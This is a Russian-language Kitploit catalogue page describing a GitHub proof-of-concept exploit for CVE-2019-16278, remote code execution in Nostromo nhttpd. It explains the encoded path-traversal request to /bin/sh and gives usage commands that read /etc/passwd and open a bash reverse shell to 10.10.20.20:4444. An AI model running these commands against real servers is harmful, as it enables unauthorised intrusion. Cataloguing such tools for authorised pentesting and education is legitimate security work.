Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-16278 — PoC-эксплойт RCE для Nostromo nhttpd ≤ 1.9.6 | Kitploit
Инструменты/GitHubGitHub/andknownmaly/cve-2019-16278
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

PoC-эксплойт RCE для Nostromo nhttpd ≤ 1.9.6

Репозиторий
39 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-16278 — Nostromo nhttpd RCE

Описание уязвимости

Уязвимость удаленного выполнения кода в Nostromo nhttpd версиях <= 1.9.6 через обход каталога при обработке HTTP-запросов.

Затронутые версии

  • Nostromo nhttpd 1.9.6 и более ранние

Детали эксплуатации

Этот эксплойт использует уязвимость обхода каталога с помощью URL-кодированных символов CRLF (%0d) для доступа к /bin/sh и выполнения произвольных команд.

Как это работает:

  1. Отправляет POST-запрос с обходом пути: /.%0d./.%0d./.%0d./.%0d./bin/sh
  2. Использует заголовок Content-Length для управления размером полезной нагрузки
  3. Выполняет команды через перенаправление shell: echo\necho\n<command> 2>&1

Использование

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

Пример:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

Рекомендуется reverse shell, иногда этот скрипт ничего не показывает

Требования

  • Python 3
  • Сетевой доступ к целевому серверу
  • Цель должна работать на уязвимой версии Nostromo nhttpd

Ссылки

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным.

Скачать инструмент